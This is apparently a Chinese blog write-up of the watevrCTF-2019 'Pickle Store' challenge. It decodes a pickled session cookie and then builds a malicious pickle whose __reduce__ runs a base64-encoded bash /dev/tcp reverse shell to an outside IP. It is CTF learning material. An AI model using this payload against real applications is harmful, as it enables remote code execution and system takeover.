[watevrCTF-2019]Pickle Store

已于 2023-08-28 14:42:06 修改
阅读量386 收藏
点赞数
文章标签: bash linux 开发语言
于 2022-08-13 20:26:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61209261/article/details/126323751
版权

考点:

        1.pickle反序列化

        2.反弹shell

        3.session伪造 

上手:

开局:

开局让你买东西 很明确有一个贵的 然后左上角是自己的钱 也直接明了说明那个就是flag 但是买不起

点击购买后钱会变少

 感觉没什么点 就抓包看看

 session看起来像base64就去弄下 主要是其他也看不出说明 id穿参也弄不出来 题目也很直接给了是pickle 就能想到pickle反序列化

解码后果然得到一些看不懂的 就用pickle去看看 

脚本

import pickle
from base64 import *

enc = "gAN9cQAoWAUAAABtb25leXEBTZABWAcAAABoaXN0b3J5cQJdcQNYFAAAAFl1bW15IHNtw7ZyZ8Olc2d1cmthcQRhWBAAAABhbnRpX3RhbXBlcl9obWFjcQVYIAAAADQ2NGZiNTE5ZWNjZDkwMDM3Y2E4MDczMTlkNDU3ODZkcQZ1Lg=="

print(pickle.loads(b64decode(enc)))
#得:{'money': 400, 'history': ['Yummy smörgåsgurka'], 'anti_tamper_hmac': '464fb519eccd90037ca807319d45786d'}

 在脚本上decode再pickle.loads不然在在其他网站带来的base64有不知道是什么的字符

思路:

得到的东西就后面看见是加密的嘛 有想过能不能改钱 改到1000给flag买了

但是加密这个东东感觉不太行 就去看其他师傅了

看了其他师傅的wp是用反序列化后上传session反弹shell

import base64
import pickle


class shell(object):
    def __reduce__(self):
    # bash -i >& /dev/tcp/你的ip/9999 0>&1的base64
    #不能直接bash -i 0>&1那种写法,因为像是&这些符号 都是linux的shell关键字 会影响他的语法
        return (eval, ("__import__('os').system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMTMyLjEzNy43My8yMCAwPiYx | base64 -d | bash ')",))


k = shell()
print(base64.b64encode(pickle.dumps(k)))

其实很简单的操作 就自己买了个腾讯的服务器给我弄不会了 然后弄了几天 受不辽了 就回原来用的阿里云服务器反弹了 我能说什么....(真没打广告

 小结:

        这波浪费时间有自己好久没反弹shell手生的原因,就是太菜了,不找借口了,就是菜,回头做出来看真的很简单的,慢慢来,想了想自己也不应该死磕这个反弹shell,早点回头去用阿里云的服务器做早做出来了,哭了

开摆了

怪小生失了神
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 392
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 861
详细讲解pickle
BUUCTF:[watevrCTF-2019]Pickle Store
末初的CSDN博客
07-26 1132
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
project-pickle
05-23
这里我们将深入探讨JavaScript在项目管理中的应用以及"project-pickle-main"可能包含的关键要素。 JavaScript是一种广泛使用的编程语言,尤其在网络应用开发中占据了主导地位。它允许开发者在客户端和服务器端创建...
python-turtle模块-pickle模块-密码程序-可更改或设置密码
02-08
原创python密码程序 知识领域: turtle模块-输入框 pickle模块-保存数据至txt文本文档 密码程序 可从Set_password.py更改密码 从Password.py运行 如有雷同纯属巧合
python-pickle-shelve
02-12
在Python编程语言中,`pickle`和`shelve`是两个非常重要的模块,它们主要用于数据序列化和持久化。这两个模块对于数据存储和恢复、跨程序间的数据传递以及简化复杂对象的保存和读取有着重要作用。 `pickle`模块是...
The-windows-pickle-login-tkinter-python-project
08-11
The-windows-pickle-login-tkinter-python-project Python的标准TK GUI工具包的接口Tkinter模块(“TK界面”)是Python的标准TK GUI工具包的接口。 TK和Tkinter可以用于大多数UNIX平台,也可以应用于windows和麦金塔...
data-table.pickle
05-08
data_table.pickle
[watevrCTF-2019]Pickle StorePickle反序列化】
D.MIND 的博客
04-29 1697
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
BUUCTF WEB PICKLE STORE
qq_41696858的博客
09-30 293
众所周知,buuctf靶场经历了内网K8S改造,导致以前的小号的内网靶机的方法出了问题,我也疑惑了很久,该怎么去用这台不知道公网ip的靶机。后来我想明白了,给的是apache2的公网ip,那就直接外带啊,果然成功了,哈哈。看着像base64,解码一下,发现一个标志:anti_tamper_hmac。无法逆向的hmac,那么结合题目的pickle,八九不离十的猜是反序列化。这一题是一个简单的python反序列化,简单的写个脚本就好,没啥好说的。关于pickle的指令解析可以看这个师傅的。
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 381
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 903
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
BUUCTF之[watevrCTF-2019]Cookie Store
weixin_44632787的博客
07-30 340
BUUCTF之[watevrCTF-2019]Cookie Store 打开挑战页面发现它说你初始基金是50,但是购买flag需要100 然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看… 一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西 结果发现!!! 所以payload: eyJtb25leSI6IDEwMCwgImhpc3Rvcnki
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过
最新发布
m0_61331573的博客
04-07 430
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CTF-rootme 题解之Python - pickle
weixin_30652879的博客
03-28 779
LINK:https://www.root-me.org/en/Challenges/App-Script/Python-pickle Referrence:https://github.com/Djazouli/RootMeHelp/blob/06d4ad358f43217c12dc8a36dc41ef9cea787f69/AppScript/Python_pickle.md  ...
python读取txt文件写入失败-写入Pickle文件时出现FileNotFoundError - python
06-10
另外,如果你正在尝试写入pickle文件,并且该文件不存在,则会出现FileNotFoundError。确保你已经创建了该文件,或者在代码中使用“w+”模式来创建文件。 以下是一个简单的示例代码,用于读取txt文件并将其写入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值